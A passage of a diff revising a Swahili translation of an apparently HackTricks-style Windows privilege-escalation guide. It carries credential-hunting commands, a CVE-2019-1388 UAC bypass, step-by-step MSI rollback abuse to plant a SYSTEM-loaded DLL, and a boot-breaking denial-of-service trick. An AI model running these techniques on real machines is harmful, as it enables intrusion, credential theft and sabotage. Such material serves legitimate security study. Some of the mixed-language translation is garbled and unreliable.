DLLs** ambazo zitatekelezwa, unaweza **kupandisha ruhusa** ikiwa DLL hiyo itatekelezwa na mtumiaji tofauti. -Ili kujifunza jinsi watapeli wanavyotumia COM Hijacking kama mbinu ya kudumu angalia: +To learn how attackers use COM Hijacking as a persistence mechanism check: {{#ref}} com-hijacking.md {{#endref}} -### **Utafutaji wa nywila kwa ujumla katika faili na registry** +### **Generic Password search in files and registry** -**Tafuta yaliyomo kwenye faili** +**Tafuta maudhui ya faili** ```bash cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt findstr /si password *.xml *.ini *.txt *.config findstr /spin "password" *.* ``` -**Tafuta faili lenye jina fulani** +**Tafuta faili yenye jina maalum** ```bash dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* where /R C:\ user.txt where /R C:\ *.ini ``` -**Tafuta kwenye rejista majina ya funguo na nywila** +**Tafuta katika registry kwa key names na passwords** ```bash REG QUERY HKLM /F "password" /t REG_SZ /S /K REG QUERY HKCU /F "password" /t REG_SZ /S /K @@ -1255,11 +1249,11 @@ REG QUERY HKCU /F "password" /t REG_SZ /S /d ``` ### Zana zinazotafuta passwords -[**MSF-Credentials Plugin**](https://github.com/carlospolop/MSF-Credentials) **is a msf** plugin. Nimeunda plugin hii ili **automatically execute every metasploit POST module that searches for credentials** ndani ya victim.\ -[**Winpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) inatafuta kiotomatiki faili zote zenye passwords zilizotajwa kwenye ukurasa huu.\ -[**Lazagne**](https://github.com/AlessandroZ/LaZagne) ni zana nyingine nzuri ya kutoa password kutoka kwenye mfumo. +[**MSF-Credentials Plugin**](https://github.com/carlospolop/MSF-Credentials) **is a msf** plugin. Niliunda plugin hii ili **automatically execute every metasploit POST module that searches for credentials** ndani ya victim.\ +[**Winpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) inatafuta moja kwa moja faili zote zenye passwords zilizotajwa kwenye ukurasa huu.\ +[**Lazagne**](https://github.com/AlessandroZ/LaZagne) ni zana nyingine nzuri ya kuchota passwords kutoka kwa mfumo. -Zana [**SessionGopher**](https://github.com/Arvanaghi/SessionGopher) inatafuta **sessions**, **usernames** na **passwords** za zana kadhaa ambazo zinaweka data hii kwa maandishi wazi (PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP) +Zana [**SessionGopher**](https://github.com/Arvanaghi/SessionGopher) inatafuta **sessions**, **usernames** na **passwords** za zana kadhaa zinazohifadhi data hii kwa clear text (PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP) ```bash Import-Module path\to\SessionGopher.ps1; Invoke-SessionGopher -Thorough @@ -1268,30 +1262,30 @@ Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss ``` ## Leaked Handlers -Imagine that **a process running as SYSTEM open a new process** (`OpenProcess()`) with **ufikiaji kamili**. The same process **also create a new process** (`CreateProcess()`) **ikiwa na ruhusa za chini lakini ikirithi handles zote zilizofunguliwa za mchakato mkuu**.\ -Then, if you have **ufikiaji kamili kwenye mchakato wenye ruhusa za chini**, you can grab the **open handle to the privileged process created** with `OpenProcess()` and **inject a shellcode**.\ +Fikiria kwamba **mchakato unaoendeshwa kama SYSTEM unafungua mchakato mpya** (`OpenProcess()`) kwa **ufikiaji kamili**. Mchakato huo huo **pia huunda mchakato mpya** (`CreateProcess()`) **kwa idhini za chini lakini ukirithi handles zote zilizo wazi za mchakato mkuu**.\ +Kisha, ikiwa una **ufikiaji kamili kwa mchakato mwenye idhini za chini**, unaweza kuchukua **open handle ya mchakato mwenye idhini iliyoundwa** na `OpenProcess()` na **kuchoma shellcode**.\ [Read this example for more information about **how to detect and exploit this vulnerability**.](leaked-handle-exploitation.md)\ [Read this **other post for a more complete explanation on how to test and abuse more open handlers of processes and threads inherited with different levels of permissions (not only full access)**](http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/). ## Named Pipe Client Impersonation -Shared memory segments, referred to as **pipes**, enable process communication and data transfer. +Shared memory segments, zinazojulikana kama **pipes**, zinawezesha mawasiliano ya mchakato na uhamishaji wa data. -Windows provides a feature called **Named Pipes**, allowing unrelated processes to share data, even over different networks. This resembles a client/server architecture, with roles defined as **named pipe server** and **named pipe client**. +Windows inatoa kipengele kinachoitwa **Named Pipes**, kuruhusu michakato isiyohusiana kushiriki data, hata kupitia mitandao tofauti. Hii inafanana na usanifu wa client/server, na majukumu yamefafanuliwa kama **named pipe server** na **named pipe client**. -When data is sent through a pipe by a **client**, the **server** that set up the pipe has the ability to **take on the identity** of the **client**, assuming it has the necessary **SeImpersonate** rights. Identifying a **mchakato mwenye ruhusa za juu** that communicates via a pipe you can mimic provides an opportunity to **pata ruhusa za juu** by adopting the identity of that process once it interacts with the pipe you established. For instructions on executing such an attack, helpful guides can be found [**here**](named-pipe-client-impersonation.md) and [**here**](#from-high-integrity-to-system). +Wakati data inapotumwa kupitia pipe na **client**, **server** iliyoweka pipe ina uwezo wa **kuchukua utambulisho** wa **client**, ikizingatia kuwa ina haki zinazohitajika za **SeImpersonate**. Kutambua **mchakato mwenye idhini** unaozungumza kupitia pipe ambayo unaweza kuiga kunatoa fursa ya **kupata ruhusa za juu** kwa kuchukua utambulisho wa mchakato huo mara tu unapoingiliana na pipe uliyoanzisha. Kwa maagizo juu ya jinsi ya kufanya shambulio kama hilo, mwongozo wenye msaada unaweza kupatikana [**here**](named-pipe-client-impersonation.md) na [**here**](#from-high-integrity-to-system). -Also the following tool allows to **intercept a named pipe communication with a tool like burp:** [**https://github.com/gabriel-sztejnworcel/pipe-intercept**](https://github.com/gabriel-sztejnworcel/pipe-intercept) **and this tool allows to list and see all the pipes to find privescs** [**https://github.com/cyberark/PipeViewer**](https://github.com/cyberark/PipeViewer) +Pia zana zifuatazo zinakuwezesha **kuingilia mawasiliano ya named pipe kwa zana kama burp:** [**https://github.com/gabriel-sztejnworcel/pipe-intercept**](https://github.com/gabriel-sztejnworcel/pipe-intercept) **na zana hii inaruhusu kuorodhesha na kuona pipes zote ili kupata privescs** [**https://github.com/cyberark/PipeViewer**](https://github.com/cyberark/PipeViewer) -## Misc +## Mengine ### File Extensions that could execute stuff in Windows -Check out the page **[https://filesec.io/](https://filesec.io/)** +Angalia ukurasa **[https://filesec.io/](https://filesec.io/)** ### **Monitoring Command Lines for passwords** -When getting a shell as a user, there may be scheduled tasks or other processes being executed which **pass credentials on the command line**. The script below captures process command lines every two seconds and compares the current state with the previous state, outputting any differences. +Unapopata shell kama mtumiaji, kunaweza kuwa na kazi zilizopangwa au michakato mingine inayotekelezwa ambayo **inapitisha leseni kwenye mstari wa amri**. Skripti hapa chini inakamata mistari ya amri ya michakato kila sekunde mbili na inalinganisha hali ya sasa na hali iliyopita, ikitoa tofauti yoyote. ```bash while($true) { @@ -1303,11 +1297,11 @@ Compare-Object -ReferenceObject $process -DifferenceObject $process2 ``` ## Kuiba nywila kutoka kwa michakato -## From Low Priv User to NT\AUTHORITY SYSTEM (CVE-2019-1388) / UAC Bypass +## Kutoka Mtumiaji wa Vibali Vidogo hadi NT\AUTHORITY SYSTEM (CVE-2019-1388) / UAC Bypass -Ikiwa una ufikiaji wa kiolesura cha picha (via console or RDP) na UAC imewezeshwa, katika matoleo kadhaa ya Microsoft Windows inawezekana kuendesha terminal au mchakato mwingine wowote kama "NT\AUTHORITY SYSTEM" kutoka kwa mtumiaji asiye na ruhusa. +Ikiwa una upatikanaji wa kiolesura cha picha (kupitia console au RDP) na UAC imewezeshwa, katika baadhi ya matoleo ya Microsoft Windows inawezekana kuendesha terminal au mchakato mwingine wowote kama "NT\AUTHORITY SYSTEM" kutoka kwa mtumiaji asiye na vibali. -Hii inafanya iwezekane kuongeza viwango vya ruhusa na bypass UAC kwa wakati mmoja kwa kutumia udhaifu huo. Zaidi ya hayo, hakuna haja ya kusakinisha chochote na binary inayotumika wakati wa mchakato, imewekwa saini na kutolewa na Microsoft. +Hii inafanya iwezekane kufanya escalate privileges na bypass UAC kwa wakati mmoja kwa udhaifu uleule. Zaidi ya hayo, hakuna haja ya kusakinisha chochote na binary inayotumika wakati wa mchakato imesainiwa na kutolewa na Microsoft. Baadhi ya mifumo iliyoathiriwa ni zifuatazo: ``` @@ -1331,7 +1325,7 @@ Windows 10 1607 14393 ** link OPENED AS SYSTEM ** Windows 10 1703 15063 link NOT opened Windows 10 1709 16299 link NOT opened ``` -Ili kutumia udhaifu huu, ni lazima ufanye hatua zifuatazo: +Ili kutumia udhaifu huu, ni lazima utekeleze hatua zifuatazo: ``` 1) Right click on the HHUPD.EXE file and run it as Administrator. @@ -1353,199 +1347,199 @@ You have all the necessary files and information in the following GitHub reposit https://github.com/jas502n/CVE-2019-1388 -## Kutoka Administrator Medium hadi High Integrity Level / UAC Bypass +## Kutoka kwa Administrator Medium hadi High Integrity Level / UAC Bypass -Soma hii ili ujifunze kuhusu Integrity Levels: +Soma hili ili **ujifunze kuhusu Integrity Levels**: {{#ref}} integrity-levels.md {{#endref}} -Kisha soma hii ili ujifunze kuhusu UAC na UAC bypasses: +Kisha **soma hili ili ujifunze kuhusu UAC na UAC bypasses:** {{#ref}} ../authentication-credentials-uac-and-efs/uac-user-account-control.md {{#endref}} -## Kutoka Arbitrary Folder Delete/Move/Rename hadi SYSTEM EoP +## Kutoka kwenye Futa/Kuhamisha/Kubadilisha Jina la Folda yoyote hadi SYSTEM EoP -Mbinu iliyotajwa [**katika chapisho hili la blogu**](https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks) pamoja na exploit code [**inapatikana hapa**](https://github.com/thezdi/PoC/tree/main/FilesystemEoPs). +Mbinu iliyofafanuliwa [**in this blog post**](https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks) pamoja na msimbo wa exploit [**available here**](https://github.com/thezdi/PoC/tree/main/FilesystemEoPs). -Shambulio linaanzia kwa kutumia kipengele cha rollback cha Windows Installer kubadilisha faili halali na zile zenye madhara wakati wa mchakato wa uninstall. Kwa hili mshambuliaji anahitaji kuunda MSI installer yenye madhara itakayotumika kupora folda ya `C:\Config.Msi`, ambayo baadaye Windows Installer itatumia kuhifadhi faili za rollback wakati wa uninstall ya vifurushi vingine vya MSI ambapo faili za rollback zingeweza kuharibiwa ili zijawe na payload ya madhara. +Shambulio linajumuisha kutumia kipengele cha rollback cha Windows Installer kubadilisha faili halali kwa zile za uhasama wakati wa mchakato wa uninstall. Kwa hili mshambuliaji anahitaji kuunda **malicious MSI installer** itakayotumika kujiiba folda `C:\Config.Msi`, ambayo baadaye itatumika na Windows Installer kuhifadhi faili za rollback wakati wa kuondolewa kwa vifurushi vingine vya MSI ambapo faili za rollback zingeweza kurekebishwa ili kuwa na payload hasidi. -Mbinu kwa ufupisho ni kama ifuatavyo: +Mbinu iliyofupishwa ni ifuatayo: -1. **Hatua 1 – Preparing for the Hijack (acha `C:\Config.Msi` tupu)** +1. **Hatua ya 1 – Kujiandaa kwa Hijack (acha `C:\Config.Msi` tupu)** -- Hatua 1: Install the MSI -- Tengeneza `.msi` inayosakinisha faili isiyo hatari (mfano, `dummy.txt`) katika folda inayoweza kuandikwa (`TARGETDIR`). -- Taja installer kama **"UAC Compliant"**, ili **mtumiaji asiye-admin** aweze kuendesha. -- Weka **handle** wazi kwa faili baada ya usakinishaji. +- Hatua 1: Sakinisha MSI +- Tengeneza `.msi` inayosakinisha faili lisilo hatari (mfano, `dummy.txt`) katika folda inayoweza kuandikwa (`TARGETDIR`). +- Chagua installer kama **"UAC Compliant"**, ili **mtumiaji asiye admin** aweze kuiendesha. +- Weka **handle** wazi kwa faili baada ya kusakinisha. -- Hatua 2: Begin Uninstall -- Uninstall `.msi` hiyo hiyo. -- Mchakato wa uninstall unaanza kuhamisha faili kwenda `C:\Config.Msi` na kuzipa majina ya `.rbf` (rollback backups). -- **Polling ya handle ya faili iliyo wazi** kwa kutumia `GetFinalPathNameByHandle` ili kugundua wakati faili inabadilika kuwa `C:\Config.Msi\.rbf`. +- Hatua 2: Anza Uninstall +- Uninstall `.msi` ile ile. +- Mchakato wa uninstall unaanza kuhamisha faili kwenda `C:\Config.Msi` na kuziacha majina kuwa `.rbf` files (rollback backups). +- **Endelea kuchunguza handle ya faili iliyo wazi** ukitumia `GetFinalPathNameByHandle` ili kugundua wakati faili inakuwa `C:\Config.Msi\.rbf`. -- Hatua 3: Custom Syncing +- Hatua 3: Syncing Maalum - `.msi` ina **custom uninstall action (`SyncOnRbfWritten`)** ambayo: -- Inatoa ishara wakati `.rbf` imeandikwa. -- Kisha **inasubiri** tukio lingine kabla ya kuendelea na uninstall. +- Inaashiria wakati `.rbf` imeandikwa. +- Kisha **inasubiri** tukio jingine kabla ya kuendelea na uninstall. -- Hatua 4: Block Deletion of `.rbf` -- Unapopokea ishara, **ufungue faili ya `.rbf`** bila `FILE_SHARE_DELETE` — hili **linazuia ifutwe**. -- Kisha **rudisha ishara** ili uninstall iendelee. -- Windows Installer haitafanikiwa kufuta `.rbf`, na kwa sababu haiwezi kufuta maudhui yote, **`C:\Config.Msi` hairudishwi**. +- Hatua 4: Zuia Kufutwa kwa `.rbf` +- Ukitumwa ishara, **fungua faili ya `.rbf`** bila `FILE_SHARE_DELETE` — hii **inazuia kufutwa kwake**. +- Kisha **tuma ishara nyuma** ili uninstall iishe. +- Windows Installer haifanyi kufuta `.rbf`, na kwa sababu haiwezi kufuta yaliyomo yote, **`C:\Config.Msi` haisiondolewa**. -- Hatua 5: Manually Delete `.rbf` -- Wewe (mshambuliaji) unafuta `.rbf` kwa mikono. -- Sasa **`C:\Config.Msi` iko tupu**, tayari kuporwa. +- Hatua 5: Futa `.rbf` kwa mkono +- Wewe (mshambuliaji) unafuta faili `.rbf` kwa mkono. +- Sasa **`C:\Config.Msi` ni tupu**, tayari kuibiwa. -> Katika hatua hii, chochea udhaifu wa SYSTEM-level wa kufuta folda kiholela ili kufuta `C:\Config.Msi`. +> Katika kipindi hiki, **anzisha hitilafu ya kufuta folda isiyochaguliwa kwa ngazi ya SYSTEM** kufuta `C:\Config.Msi`. -2. **Hatua 2 – Replacing Rollback Scripts with Malicious Ones** +2. **Hatua ya 2 – Kubadilisha Rollback Scripts na Zenye Uhalifu** -- Hatua 6: Recreate `C:\Config.Msi` with Weak ACLs -- Unda tena folda ya `C:\Config.Msi` mwenyewe. -- Weka **DACLs dhaifu** (mfano, Everyone:F), na **weka handle wazi** ukiwa na `WRITE_DAC`. +- Hatua 6: Unda tena `C:\Config.Msi` na ACL dhaifu +- Unda tena folda `C:\Config.Msi` mwenyewe. +- Weka **DACLs dhaifu** (mfano, Everyone:F), na **weka handle wazi** na `WRITE_DAC`. -- Hatua 7: Run Another Install -- Sakinisha `.msi` tena, ambapo: -- `TARGETDIR`: Mahali pa kuandikwa. -- `ERROROUT`: Kigezo kinachochochea kushindwa kwa lazima. -- Usakinishaji huu utatumika kuchochea **rollback** tena, ambayo inasoma `.rbs` na `.rbf`. +- Hatua 7: Endesha Install nyingine +- Sakinisha `.msi` tena, ukiwa na: +- `TARGETDIR`: Mahali pa kuandika. +- `ERROROUT`: Kigezo kinachosababisha kushindwa kwa lazima. +- Install hii itatumika kusababisha **rollback** tena, ambayo inasoma `.rbs` na `.rbf`. -- Hatua 8: Monitor for `.rbs` -- Tumia `ReadDirectoryChangesW` kufuatilia `C:\Config.Msi` hadi `.rbs` mpya itaonekana. -- Rekodi jina lake. +- Hatua 8: Chunguza kwa `.rbs` +- Tumia `ReadDirectoryChangesW` kuchunguza `C:\Config.Msi` hadi `.rbs` mpya itaonekana. +- Chukua jina la faili yake. -- Hatua 9: Sync Before Rollback +- Hatua 9: Sync Kabla ya Rollback - `.msi` ina **custom install action (`SyncBeforeRollback`)** ambayo: -- Inatoa ishara tukio linapotengenezwa `.rbs`. +- Inaashiria tukio wakati `.rbs` imeundwa. - Kisha **inasubiri** kabla ya kuendelea. -- Hatua 10: Reapply Weak ACL -- Baada ya kupokea tukio la `.rbs created`: -- Windows Installer **inarudisha ACL kali** kwa `C:\Config.Msi`. -- Lakini kwa kuwa bado una handle yenye `WRITE_DAC`, unaweza **kurudisha ACL dhaifu** tena. +- Hatua 10: Tumia tena ACL dhaifu +- Baada ya kupokea tukio la ` .rbs created`: +- Windows Installer **inatumia tena ACL kali** kwa `C:\Config.Msi`. +- Lakini kwa kuwa bado una handle na `WRITE_DAC`, unaweza **tumia tena ACL dhaifu** tena. -> ACLs zinatekelezwa **tu wakati handle inafunguliwa**, hivyo bado unaweza kuandika kwenye folda. +> ACLs zinafanywa **tu wakati handle imefunguliwa**, hivyo bado unaweza kuandika kwenye folda. -- Hatua 11: Drop Fake `.rbs` and `.rbf` -- Ibiyesi faili ya `.rbs` na **script ya rollback feki** ambayo inaelekeza Windows: -- Kurudisha `.rbf` yako (DLL yenye madhara) katika eneo lenye mamlaka (mfano, `C:\Program Files\Common Files\microsoft shared\ink\HID.DLL`). -- Angusha `.rbf` yako ya uongo yenye **DLL yenye payload ya SYSTEM**. +- Hatua 11: Weka `.rbs` na `.rbf` feki +- Bandikisha juu ya faili `.rbs` na **rollback script feki** inayowaambia Windows ili: +- Rejesha faili yako `.rbf` (DLL hasidi) katika **mahali lenye vipaumbele** (mfano, `C:\Program Files\Common Files\microsoft shared\ink\HID.DLL`). +- Weka `.rbf` yako feki inayojumuisha **DLL ya payload hasidi ya ngazi ya SYSTEM**. -- Hatua 12: Trigger the Rollback -- Toa ishara ya sync ili installer iendelee. -- Custom action ya aina 19 (`ErrorOut`) imeandaliwa kusababisha usakinishaji kushindwa kwa makusudi mahali maalum. -- Hii inasababisha **rollback kuanza**. +- Hatua 12: Sababisha Rollback +- Tuma ishara ya sync ili installer iendelee. +- Kitendo maalum cha aina 19 (`ErrorOut`) kimepangwa ili **kufanya kusababisha kushindwa kwa kusakinisha kwa hiari** mahali panapojulikana. +- Hii husababisha **rollback kuanza**. -- Hatua 13: SYSTEM Installs Your DLL +- Hatua 13: SYSTEM Inasakinisha DLL Yako - Windows Installer: -- Inasoma `.rbs` yako yenye madhara. -- Inakopia `.rbf` DLL yako hadi eneo la lengo. -- Sasa una **DLL yako yenye madhara katika njia inayopakiwa na SYSTEM**. +- Inasoma `.rbs` yako hasidi. +- Inanakili DLL yako ya `.rbf` katika eneo lengwa. +- Sasa una **DLL yako hasidi katika njia inayopakiwa na SYSTEM**. -- Hatua ya Mwisho: Execute SYSTEM Code -- Endesha binary iliyotambulika na auto-elevated (mfano, `osk.exe`) ambayo inaload DLL uliyepora. +- Hatua ya Mwisho: Endesha msimbo wa SYSTEM +- Endesha binary unaoaminika wa **auto-elevated** (mfano, `osk.exe`) unaochukua DLL uliyoiiba. - **Boom**: Msimbo wako unatekelezwa **kama SYSTEM**. -### Kutoka Arbitrary File Delete/Move/Rename hadi SYSTEM EoP +### Kutoka Futa/Hamisha/Badilisha Jina la Faili Yenyewe hadi SYSTEM EoP -Mbinu kuu ya MSI rollback (ile ya hapo juu) inadhani unaweza kufuta **folda nzima** (mfano, `C:\Config.Msi`). Lakini vipi ikiwa udhaifu wako unaruhusu tu **kufuta faili kiholela**? +Mbinu kuu ya MSI rollback (ileo hapo juu) inaeleza kuwa unaweza kufuta **folda nzima** (mfano, `C:\Config.Msi`). Lakini vipi ikiwa udhaifu wako unaruhusu tu **kufuta faili yoyote** ? -Unaweza kutumia mambo ya ndani ya NTFS: kila folda ina hidden alternate data stream inayoitwa: +Unaweza kutumia **NTFS internals**: kila folda ina hidden alternate data stream called: ``` C:\SomeFolder::$INDEX_ALLOCATION ``` Mtiririko huu unahifadhi **metadata ya index** ya folda. -Kwa hivyo, ukifuta **stream ya `::$INDEX_ALLOCATION`** ya folda, NTFS **huondoa folda nzima** kutoka kwenye filesystem. +Hivyo, ikiwa **utafuta mtiririko `::$INDEX_ALLOCATION`** wa folda, NTFS **itaondoa folda nzima** kutoka kwenye mfumo wa faili. Unaweza kufanya hivyo kwa kutumia API za kawaida za kufuta faili kama: ```c DeleteFileW(L"C:\\Config.Msi::$INDEX_ALLOCATION"); ``` -> Ingawa unaitisha API ya kufuta *file*, inafuta **folder yenyewe**. +> Ingawa unaitisha API ya kufuta *file*, **inafuta folder yenyewe**. ### Kutoka Folder Contents Delete hadi SYSTEM EoP -Je, vipi ikiwa primitive yako hairuhusi kufuta arbitrary files/folders, lakini inaruhusu **kufutwa kwa *contents* ya attacker-controlled folder**? +Je, primitive yako hairuhusu kufuta files/folders yoyote, lakini **inaruhusu kufuta *contents* za attacker-controlled folder**? -1. Hatua 1: Tayarisha folder na file la mtego +1. Step 1: Andaa bait folder na file - Create: `C:\temp\folder1` - Inside it: `C:\temp\folder1\file1.txt` -2. Hatua 2: Weka **oplock** kwenye `file1.txt` -- Oplock **inasitisha utekelezaji** wakati mchakato wenye vibali unajaribu kufuta `file1.txt`. +2. Step 2: Weka **oplock** kwenye `file1.txt` +- Oplock **inasitisha utekelezaji** wakati mchakato mwenye ruhusa anajaribu kufuta `file1.txt`. ```c // pseudo-code RequestOplock("C:\\temp\\folder1\\file1.txt"); WaitForDeleteToTriggerOplock(); ``` -3. Hatua 3: Chochea mchakato wa SYSTEM (mfano, `SilentCleanup`) -- Mchakato huu hupitia folda (mfano, `%TEMP%`) na kujaribu kufuta yaliyomo ndani yao. -- Inapofika kwenye `file1.txt`, **oplock triggers** na inakabidhi udhibiti kwa callback yako. +3. Hatua 3: Sababisha mchakato wa SYSTEM (mfano, `SilentCleanup`) +- Mchakato huu unachambua folda (mfano, `%TEMP%`) na unajaribu kufuta yaliyomo ndani yake. +- Inapofika kwenye `file1.txt`, **oplock triggers** na inatoa udhibiti kwa callback yako. -4. Hatua 4: Ndani ya oplock callback – elekeza kufutwa +4. Hatua 4: Ndani ya callback ya oplock – elekeza tena ufutaji - Chaguo A: Hamisha `file1.txt` mahali pengine -- Hii itafanya `folder1` kuwa tupu bila kuvunja oplock. -- Usifute `file1.txt` moja kwa moja — hilo litaachilia oplock mapema. +- Hili huifanya `folder1` kuwa tupu bila kuvunja oplock. +- Usifute `file1.txt` moja kwa moja — hiyo itaachilia oplock mapema. - Chaguo B: Geuza `folder1` kuwa **junction**: ```bash # folder1 is now a junction to \RPC Control (non-filesystem namespace) mklink /J C:\temp\folder1 \\?\GLOBALROOT\RPC Control ``` -- Chaguo C: Tengeneza **symlink** katika `\RPC Control`: +- Chaguo C: Unda **symlink** katika `\RPC Control`: ```bash # Make file1.txt point to a sensitive folder stream CreateSymlink("\\RPC Control\\file1.txt", "C:\\Config.Msi::$INDEX_ALLOCATION") ``` -> Hii inalenga mtiririko wa ndani wa NTFS unaohifadhi metadata ya folda — kuifuta kunafuta folda. +> Hii inalenga mtiririko wa ndani wa NTFS unaohifadhi metadata ya folda — kuifuta inafuta folda. -5. Hatua ya 5: Kuachilia oplock -- Mchakato wa SYSTEM unaendelea na kujaribu kufuta `file1.txt`. -- Lakini sasa, kutokana na junction + symlink, kwa kweli inafanya kufuta: +5. Hatua ya 5: Achilia oplock +- Mchakato wa SYSTEM unaendelea na unajaribu kufuta `file1.txt`. +- Lakini sasa, kutokana na junction + symlink, kwa kweli inafuta: ``` C:\Config.Msi::$INDEX_ALLOCATION ``` -**Matokeo**: `C:\Config.Msi` is deleted by SYSTEM. +**Matokeo**: `C:\Config.Msi` imefutwa na SYSTEM. -### Kutoka Arbitrary Folder Create hadi Permanent DoS +### Kutoka Kuunda Folda ya Nasibu hadi DoS ya Kudumu -Tumia primitive inayokuwezesha **create an arbitrary folder as SYSTEM/admin** — hata kama **huwezi kuandika faili** au **kuweka ruhusa dhaifu**. +Tumia primitive inayoikuruhusu **kuunda folda yoyote kama SYSTEM/admin** — hata kama **hautiwezi kuandika faili** au **kusanidi ruhusa dhaifu**. -Unda **kabrasha** (sio faili) lenye jina la **driver muhimu wa Windows**, mfano: +Unda **folda** (sio faili) yenye jina la **dereva muhimu wa Windows**, kwa mfano: ``` C:\Windows\System32\cng.sys ``` - Njia hii kwa kawaida inalingana na driver ya kernel-mode `cng.sys`. -- Ikiwa utaifanya awali kama folda, Windows itashindwa kupakia driver halisi wakati wa boot. +- Ikiwa **utaiunda mapema kama folda**, Windows inashindwa kupakia driver halisi wakati wa boot. - Kisha, Windows inajaribu kupakia `cng.sys` wakati wa boot. -- Inapoiona folda, **inashindwa kutatua driver halisi**, na **inaanguka au kusimamisha boot**. -- Hakuna **njia mbadala**, na hakuna **urejeshaji** bila uingiliaji wa nje (kwa mfano, marekebisho ya boot au ufikiaji wa diski). +- Inaiona folda, **inashindwa kutatua driver halisi**, na **inasababisha crash au kusimamisha boot**. +- Hakuna **njia mbadala**, na hakuna **urejesho** bila uingiliaji wa nje (kwa mfano, ukarabati wa boot au ufikiaji wa diski). ## **Kutoka High Integrity hadi System** ### **Huduma mpya** -Ikiwa tayari unatekeleza mchakato wa High Integrity, **njia hadi SYSTEM** inaweza kuwa rahisi kwa tu **kuunda na kutekeleza service mpya**: +Ikiwa tayari unafanya kazi kwenye mchakato wa High Integrity, **njia ya kupata SYSTEM** inaweza kuwa rahisi kwa **kuunda na kutekeleza service mpya**: ``` sc create newservicename binPath= "C:\windows\system32\notepad.exe" sc start newservicename ``` > [!TIP] -> Wakati unaunda service binary hakikisha ni service halali au kwamba binary inafanya vitendo vinavyohitajika haraka — itauawa ndani ya 20s ikiwa si service halali. +> Wakati wa kuunda service binary hakikisha ni service halali au kwamba binary inatekeleza vitendo vinavyohitajika haraka kwani itauawa ndani ya 20s ikiwa sio service halali. ### AlwaysInstallElevated -Kutoka kwenye High Integrity process unaweza kujaribu ku-enable the AlwaysInstallElevated registry entries na install reverse shell ukitumia _**.msi**_ wrapper.\ +Kutoka kwa High Integrity process unaweza kujaribu **kuwezesha AlwaysInstallElevated registry entries** na **kufunga** reverse shell kwa kutumia _**.msi**_ wrapper.\ [More information about the registry keys involved and how to install a _.msi_ package here.](#alwaysinstallelevated) ### High + SeImpersonate privilege to System @@ -1554,19 +1548,19 @@ Kutoka kwenye High Integrity process unaweza kujaribu ku-enable the AlwaysInstal ### From SeDebug + SeImpersonate to Full Token privileges -Ikiwa una token privileges hizo (huenda utakuta hii katika already High Integrity process), utaweza kufungua almost any process (si protected processes) kwa kutumia SeDebug privilege, copy the token ya process, na ku-create arbitrary process ukiwa na token hiyo.\ -Kwa kutumia technique hii kawaida huchaguliwa process yoyote inayofanya kazi kama SYSTEM yenye token privileges zote (_ndio, unaweza kupata SYSTEM processes bila token privileges zote_).\ +Ikiwa una token privileges hizo (huenda utakutana nazo katika process ambayo tayari iko kwa High Integrity), utaweza **fungua karibu process yoyote** (si protected processes) kwa kutumia SeDebug privilege, **kunakili token** ya process, na kuunda **process yoyote kwa kutumia token hiyo**.\ +Kutumia technique hii kwa kawaida ni **kuchagua process yoyote inayoendesha kama SYSTEM yenye token privileges zote** (_ndio, unaweza kupata SYSTEM processes zisizo na token privileges zote_).\ **You can find an** [**example of code executing the proposed technique here**](sedebug-+-seimpersonate-copy-token.md)**.** ### **Named Pipes** -Teknik hii inatumiwa na meterpreter ku-escalate katika `getsystem`. Teknik inajumuisha ku-create pipe kisha ku-create/abuse service ili kuandika kwenye pipe hiyo. Kisha, server aliyeunda pipe akitumia `SeImpersonate` privilege ataweza impersonate token ya pipe client (service) na kupata SYSTEM privileges.\ -If you want to [**learn more about name pipes you should read this**](#named-pipe-client-impersonation).\ -If you want to read an example of [**how to go from high integrity to System using name pipes you should read this**](from-high-integrity-to-system-with-name-pipes.md). +Technique hii inatumiwa na meterpreter kupandisha kiwango katika `getsystem`. Technique inajumuisha **kuunda pipe na kisha kuunda/kukutumia vibaya service kuandika kwenye pipe hiyo**. Kisha, **server** iliyounda pipe kwa kutumia **`SeImpersonate`** privilege itaweza **kuiga token** ya client wa pipe (service) na kupata SYSTEM privileges.\ +Ikiwa unataka [**learn more about name pipes you should read this**](#named-pipe-client-impersonation).\ +Ikiwa unataka kusoma mfano wa [**how to go from high integrity to System using name pipes you should read this**](from-high-integrity-to-system-with-name-pipes.md). ### Dll Hijacking -Ikiwa utafanikiwa hijack dll inayopakiwa na process inayoendesha kama SYSTEM utaweza execute arbitrary code kwa ruhusa hizo. Kwa hiyo Dll Hijacking pia ni muhimu kwa aina hii ya privilege escalation, na moreover, ni rahisi zaidi kufikiwa kutoka kwa high integrity process kwani itakuwa na write permissions kwenye folders zinazotumika kupakia dlls.\ +Ikiwa utafanikiwa **hijack a dll** inayokuwa **loaded** na **process** inayofanya kazi kama **SYSTEM** utaweza kutekeleza arbitrary code kwa ruhusa hizo. Kwa hivyo Dll Hijacking pia ni muhimu kwa aina hii ya privilege escalation, na zaidi, ni **rahisi zaidi kufikiwa kutoka kwa process ya high integrity** kwa sababu itakuwa na **write permissions** kwenye folda zinazotumiwa kupakia dlls.\ **You can** [**learn more about Dll hijacking here**](dll-hijacking/index.html)**.** ### **From Administrator or Network Service to System** @@ -1585,49 +1579,49 @@ Ikiwa utafanikiwa hijack dll inayopakiwa na process inayoendesha kama SYSTEM uta ## Useful tools -**Chombo bora kutafuta Windows local privilege escalation vectors:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS) +**Best tool to look for Windows local privilege escalation vectors:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS) **PS** [**PrivescCheck**](https://github.com/itm4n/PrivescCheck)\ -[**PowerSploit-Privesc(PowerUP)**](https://github.com/PowerShellMafia/PowerSploit) **-- Kagua misconfigurations na mafaili nyeti (**[**check 